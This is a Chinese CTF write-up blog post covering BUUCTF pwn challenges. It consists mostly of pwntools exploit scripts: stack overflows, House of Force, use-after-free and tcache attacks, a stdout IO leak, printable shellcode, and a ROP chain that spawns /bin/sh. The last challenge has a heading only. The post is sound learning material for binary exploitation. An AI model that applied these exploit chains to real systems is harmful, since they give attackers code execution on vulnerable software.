BUUCTF第三周

wdb2018_guess

(较易)考点:

  • fork子进程
  • stack smashing
  • 利用environ确定任意栈地址
def exp():
    """Interaction script for wdb2018_guess (BUUCTF week 3 writeup).

    Each round sends 0x128 filler bytes followed by one 8-byte pointer and
    reads a 6-byte address (up to the ``\\x7f`` byte) back from the reply.
    The writeup lists the techniques as "stack smashing" and locating the
    stack via ``environ``. Helpers (ru, sl, sla, uu64, p64, elf, libc) are
    defined elsewhere in the file / pwntools and are not shown here.
    The offsets 0x128 and 0x168 are specific to this binary and its
    environment.
    """
    ru("Please type your guessing flag")
    # Round 1: the pointer after the filler is the GOT slot of puts; the
    # address that comes back is treated as puts' libc address.
    sl('a' * 0x128 + p64(elf.got['puts']))
    libc_base = uu64(ru("\x7f")[-6:]) - libc.sym['puts']
    # Round 2: same pattern with libc's __environ to obtain a stack pointer.
    environ = libc_base + libc.sym["__environ"]
    sla('Please type your guessing flag', 'a' * 0x128 + p64(environ))
    # 0x168 is the writeup's fixed distance from that stack pointer to the flag buffer.
    flag = uu64(ru("\x7f")[-6:]) - 0x168
    # Round 3: presumably the reply now contains the flag buffer contents
    # (not read back here; inferred from the writeup).
    sla("Please type your guessing flag", 'a' * 0x128 + p64(flag))
    pass

gyctf_2020_force

(较难)考点:

  • mmap泄露堆地址
  • House of Force
  • realloc_hook调整栈帧使og生效

卡在了泄露地址这个点,学到了mmap出来的空间相邻libc的地址

house of force改top chunk的size为-1(0xfff…)

然后就可以申请任意大小,算下malloc_hook到top chunk的偏移,然后申请到附近改那两个hook

def exp():
    """Interaction script for gyctf_2020_force (House of Force, per the writeup).

    Helpers (add, echo, gdba, sla, menu, _add, p64, libc) are defined
    elsewhere in the file and are not shown here. ``add`` is assumed to
    return the address of the new allocation (it is used arithmetically
    below). The hook symbols used here were removed from glibc in 2.34, so
    this chain only applies to the challenge's older libc.
    """
    # A 0x200000-byte request is served by mmap; the writeup notes that
    # region lands next to libc, hence the fixed 0x201000 - 0x10 adjustment.
    libc_base = add(0x200000, 'mmap') + 0x201000 - 0x10
    echo("base:" + hex(libc_base))
    # Overflow past the 0x10 user bytes into the following chunk header:
    # prev_size = 0, size = 0xffff...ff (top chunk size set to -1).
    one_addr = add(0x10, 'a' * 0x10 + p64(0) + p64(0xffffffffffffffff)) - 0x10
    # Request size chosen so the allocation after it lands just below __malloc_hook.
    size = (libc_base + libc.sym["__malloc_hook"]) - (one_addr + 0x20) - 0x40
    echo(hex(size))
    add(size, 'a')
    # one_gadget offsets hard-coded for the challenge's libc version.
    og = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
    # Two adjacent 8-byte values after 0x18 bytes of padding: og[1] and
    # __libc_realloc + 0x10 — presumably __realloc_hook and __malloc_hook
    # respectively (the "realloc_hook adjusts the stack frame" trick the
    # writeup names; exact slot layout not visible here).
    binsh = add(0x40, '\x00' * 0x18 + p64(libc_base + og[1]) + p64(libc_base + libc.sym["__libc_realloc"] + 0x10))
    gdba()
    # One more allocation request so the overwritten hook is invoked.
    sla(menu, str(_add))
    sla("size", str(0xdead))
    pass

picoctf_2018_buffer overflow 0

(较易)考点:

  • 栈溢出
  • signal调用后门函数

ssh连接到服务器,运行函数通过命令行传入参数然后泄露出flag

gyctf_2020_some_thing_interesting

(中等)考点:

  • UAF
  • 堆布局构造unsorted bin
def exp():
    """Interaction script for gyctf_2020_some_thing_interesting (UAF + unsorted bin).

    Helpers (sa, add, free, show, edit, ru, uu64, echo, gdba, io, p64, libc)
    are defined elsewhere and not shown; ``add`` here takes two size/data
    pairs per call. The final step targets __malloc_hook, which no longer
    exists in glibc >= 2.34. Offsets (0x80, 88 + 0x10, 0x23) are specific
    to the challenge's binary and libc.
    """
    sa("> Input your code please:", "OreOOrereOOreO")
    # Initial layout: two add() calls, the first carrying fake 0x41 headers.
    add(0x30, p64(0) + p64(0x41),0x30, p64(0) + p64(0x41))
    add(0x30, 'aaaa', 0x30, 'bbbb')
    # free() followed by show() on the same index — the use-after-free the
    # writeup names; the 6 bytes after "RE is " are taken as a heap pointer.
    free(2)
    show(2)
    ru("RE is ")
    heap = uu64(io.recvuntil("\n", drop=True)[-6:]) - 0x80
    echo("heap:" + hex(heap))
    # The freed entry is still editable: its stored pointer is set to heap + 0x10
    # (edit()'s argument meaning is not visible here).
    edit(2, '\x00', p64(heap + 0x10))
    # Fake 0x91 size so a later free goes to the unsorted bin (writeup's heap layout).
    payload = p64(0) * 4 + p64(0) + p64(0x91)
    add(0x30, p64(0) + p64(0x31), 0x30, payload)
    free(1)
    show(1)
    # The leaked pointer is presumably into main_arena; 88 + 0x10 is the
    # writeup's offset from it to __malloc_hook for this libc.
    libc_base = uu64(ru("\x7f")[-6:]) - 88 - 0x10 - libc.sym["__malloc_hook"]
    echo("libc base:" + hex(libc_base))
    libc.address = libc_base

    add(0x60, 'a', 0x60, 'a') # 3
    add(0x60, 'a', 0x60, 'b') # 4
    # Second UAF: after free(4) its pointer is redirected to __malloc_hook - 0x23.
    free(4)
    edit(4, p64(0), p64(libc.sym["__malloc_hook"] - 0x23))

    # one_gadget offsets hard-coded for the challenge's libc version.
    og = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
    # 0x13 padding bytes so og[3] lines up with the hook (0x23 - 0x10 header).
    payload = 0x13 * '\x00' + p64(libc.address + og[3])
    add(0x60, 'a', 0x60, payload)

    # add(0x50, p64(0xdeadbeef), 0x40, 'hello')
    gdba()
    pass

mrctf2020_shellcode_revenge

(难)考点:

  • 部分可见字符的shellcode编写

震撼我一整年

def exp():
    """Interaction script for mrctf2020_shellcode_revenge.

    Sends one fixed string after the "Show me your magic!" prompt; the
    writeup describes it as shellcode written with (mostly) printable
    characters. ``sa`` is a helper defined elsewhere in the file.
    """
    sa("Show me your magic!", "Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t")
    pass

X86:https://introspelliam.github.io/2017/09/30/pwn/%E5%85%A8%E6%98%AF%E5%8F%AF%E8%A7%81%E5%AD%97%E7%AC%A6%E7%9A%84shellcode/

roarctf_2019_realloc_magic

(难)考点:

  • realloc函数的特性
  • 堆布局
  • 2.27下的IO泄露地址

总结:没有edit可以通过连续的free函数做uaf;由于不检查size,在只有heapptr的时候可以realloc(0)后构造overlap,覆盖victim的size,这样的效果可以使得逐个清空某个size大小的tcache bin,最终申请到freehook;泄露io直接申请到stdout的地方改writebase为0x58泄露IO-file-jumps的地址;爆破注意模板

def exp():
    """Interaction script for roarctf_2019_realloc_magic (glibc 2.27 tcache).

    Per the writeup: repeated free() gives a UAF without an edit primitive,
    realloc(0) plus a size overwrite builds overlapping chunks, a stdout
    write-pointer tweak leaks ``_IO_file_jumps``, and the last step writes
    ``system`` into ``__free_hook`` (removed in glibc 2.34). Helpers (dbg,
    add, free, backdoor, echo, gdba, ia, io, libc, u64, p64, p8) come from
    elsewhere in the file. Calls exit(-1) when no leak arrives; the
    ``__main__`` loop reconnects and retries.
    """
    dbg()
    # Initial layout: chunks of 0x60 / 0xa0 / 0x10 / 0xa0, each followed by
    # add(0, '\x00') — per the writeup, a size-0 realloc acts as a free.
    add(0x60, 'a')
    add(0, '\x00')
    add(0xa0, 'a')
    add(0, '\x00')
    add(0x10, 'b')
    add(0, '\x00')
    add(0xa0, 'a')

    # Seven consecutive free() calls on the same pointer: the repeated-free
    # UAF the writeup describes (no edit primitive needed).
    for i in range(7):
        free()
    add(0, '')
    add(0x60, '\x00')

    # Overlap: overwrite a neighbouring chunk header (size 0x41) and the low
    # two bytes of a pointer (0x60, 0x97). The 0x97 byte is presumably
    # partly ASLR-dependent, hence the retry loop in __main__.
    payload = 0x60 * 'a' + p64(0) + p64(0x41) + p8(0x60) + p8(0x97)
    add(0x110, payload)
    add(0, '')

    add(0xa0, '\x00')
    add(0, '')
    # Forged stdout FILE: flags 0xfbad1887, three NULL pointers, then a
    # write-pointer low byte of 0x58 — the writeup's 2.27 IO leak.
    add(0xa0, p64(0xfbad1887) + p64(0) * 3 + p8(0x58))
    leak = u64(io.recvuntil("\x7f",timeout=0.1)[-6:].ljust(8, '\x00')) - libc.sym["_IO_file_jumps"]
    echo("leak:" + hex(leak))
    # If the 0.1 s read returned nothing, u64 of the padding is 0 and the
    # subtraction yields exactly -_IO_file_jumps: treat as a miss and bail.
    if leak == -libc.sym["_IO_file_jumps"]:
        exit(-1)

    backdoor()
    __free_hook = leak + libc.sym["__free_hook"]
    add(0x30, 'a')
    free()
    add(0, '')

    # Place a 0x51 header and a pointer to __free_hook - 8 via the overlap.
    add(0x110, 'a' * 0x68 + p64(0x51) + p64(__free_hook - 8))
    add(0, '')

    # Single-byte write of the low byte of (__free_hook - 8).
    add(0x30, p8((__free_hook - 8) & 0xff))
    add(0, '')

    # "/bin/sh\0" at __free_hook - 8, system at __free_hook.
    add(0x30, '/bin/sh\x00' + p64(leak + libc.sym["system"]))
    # free()
    gdba()
    ia()

if __name__ == '__main__':
    # Retry loop for the brute-force part of exp(): reconnect on every failure.
    while True:
        # io = process(challenge,env = {"LD_PRELOAD":libc_path_local})
        io = remote("node4.buuoj.cn", 29747)
        try:
            exp()
        except:
            # NOTE: the bare except is load-bearing here — it also catches the
            # SystemExit raised by exit(-1) inside exp(), which is what makes a
            # missed leak retry. The same breadth swallows KeyboardInterrupt,
            # so Ctrl-C does not stop this loop; the only exit is exp()
            # returning normally.
            io.close()
            continue

强网杯2019 拟态 STKOF

(较易)考点:

  • 栈溢出
  • 静态编译

ROPgadget生成的ropchain长度超了,改用ropper生成的可以

def exp():
    """Interaction script for 强网杯2019 拟态 STKOF (static binary, stack overflow).

    Builds a ropper-generated chain (the writeup notes ROPgadget's output
    was too long): stores "//bin/sh" and a NULL at two fixed addresses,
    loads rdi/rsi/rdx, sets rax = 0x3b and issues ``syscall``. Gadget
    offsets are rebased on IMAGE_BASE_0 and are tied to the binary whose
    hash appears in the comment below. Python 2 code: ``print`` statement
    and str-typed payloads (pack() returns bytes on Python 3, so the
    ``rop += ...`` concatenation would fail there). Helpers (pack, echo,
    ru, sd) come from elsewhere in the file.
    """

    p = lambda x : pack('Q', x)

    IMAGE_BASE_0 = 0x0000000000400000 # 40e64f05032527bd1aaaaf05161090bf0ee2f31afe5144cf358725e178579b73
    rebase_0 = lambda x : p(x + IMAGE_BASE_0)

    rop = ''

    # Write "//bin/sh" to IMAGE_BASE_0 + 0x2a10e0 via r13 -> [rdi].
    rop += rebase_0(0x0000000000001d0d) # 0x0000000000401d0d: pop r13; ret;
    rop += '//bin/sh'
    rop += rebase_0(0x00000000000005f6) # 0x00000000004005f6: pop rdi; ret;
    rop += rebase_0(0x00000000002a10e0)
    rop += rebase_0(0x0000000000055ec9) # 0x0000000000455ec9: mov qword ptr [rdi], r13; pop rbx; pop rbp; pop r12; pop r13; ret;
    # Four filler values consumed by the pops after the mov.
    rop += p(0xdeadbeefdeadbeef)
    rop += p(0xdeadbeefdeadbeef)
    rop += p(0xdeadbeefdeadbeef)
    rop += p(0xdeadbeefdeadbeef)
    # Write a NULL qword at IMAGE_BASE_0 + 0x2a10e8 (string terminator / empty argv).
    rop += rebase_0(0x0000000000001d0d) # 0x0000000000401d0d: pop r13; ret;
    rop += p(0x0000000000000000)
    rop += rebase_0(0x00000000000005f6) # 0x00000000004005f6: pop rdi; ret;
    rop += rebase_0(0x00000000002a10e8)
    rop += rebase_0(0x0000000000055ec9) # 0x0000000000455ec9: mov qword ptr [rdi], r13; pop rbx; pop rbp; pop r12; pop r13; ret;
    rop += p(0xdeadbeefdeadbeef)
    rop += p(0xdeadbeefdeadbeef)
    rop += p(0xdeadbeefdeadbeef)
    rop += p(0xdeadbeefdeadbeef)
    # Syscall arguments: rdi = string, rsi = rdx = the NULL qword, rax = 0x3b.
    rop += rebase_0(0x00000000000005f6) # 0x00000000004005f6: pop rdi; ret;
    rop += rebase_0(0x00000000002a10e0)
    rop += rebase_0(0x0000000000005895) # 0x0000000000405895: pop rsi; ret;
    rop += rebase_0(0x00000000002a10e8)
    rop += rebase_0(0x000000000003d9d5) # 0x000000000043d9d5: pop rdx; ret;
    rop += rebase_0(0x00000000002a10e8)
    rop += rebase_0(0x000000000003b97c) # 0x000000000043b97c: pop rax; ret;
    rop += p(0x000000000000003b)
    rop += rebase_0(0x0000000000061645) # 0x0000000000461645: syscall; ret;
    print rop

    # 0x118 bytes of padding before the saved return address (binary-specific).
    payload = 'a' * 0x118
    payload += rop

    echo(hex(len(payload)))
    ru("We give you a little challenge, try to pwn it?")
    sd(payload)
    pass

ciscn_2019_final_5

文章作者: Alex
文章链接: http://example.com/2021/08/05/BUUCTF第三周/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Alex's blog~